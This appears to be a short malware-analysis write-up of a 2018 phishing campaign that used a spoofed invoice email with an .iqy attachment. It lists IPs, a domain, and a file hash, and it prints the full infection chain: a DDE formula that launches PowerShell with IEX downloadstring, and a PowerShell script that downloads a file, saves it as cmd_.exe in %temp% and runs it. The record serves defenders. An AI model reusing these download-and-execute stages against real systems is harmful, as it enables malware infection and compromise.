1.dat 2.dat doc.xls cmd_.exe

1. June 5, 2018 Phishing email comes in as spoofed source of your company email with an attachment
2.  
3. Malware contact IP addresses:
4. 95.213.251.149 Port 80
5. 185.222.202.139 Port 80
6.  
7. Domain: brembotembo.com
8.  
9. Malware language: Russian
10.  
11. Subject: Unpaid invoice [ID:Sales invoice Z12_01 copy.iqy]
12. Body: No content
13.  
14. The attachment Sales invoice Z12_01 copy.iqy.iqy
15. Contents:
16. WEB
17. 1
18. http://brembotembo[.]com/2.dat
19. 2
20. a
21. 3
22. b
23. 4
24. c
25. 5
26.  
27. Contents of 2.dat that gets downloaded:
28. =cmd|' /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -NoExit -c IEX ((new-object net.webclient).downloadstring(\"http://brembotembo[.]com/1.dat\"))'!A0
29.  
30. Contents of 1.dat that gest downloaded:
31.  
32. $urls = "http://brembotembo[.]com/doc.xls",""
33. foreach($url in $urls){
34. Try
35. {
36. Write-Host $url
37. $fp = "$env:temp\cmd_.exe"
38. Write-Host $fp
39. $wc = New-Object System.Net.WebClient
40. $wc.DownloadFile($url, $fp)
41. Start-Process $fp
42. break
43. }
44. Catch
45. {
46. Write-Host $_.Exception.Message
47. }
48.  
49.  
50. }
51.  
52. Contents of doc.xls gets saved as cmd_.exe and executed:
53. SHA256 of the cmd_.exe is 30e2f8e905e4596946e651627c450e3cc574fdf58ea6e41cdad1f06190a05216
54. https://www.virustotal.com/en/file/30e2f8e905e4596946e651627c450e3cc574fdf58ea6e41cdad1f06190a05216/analysis/1528207462/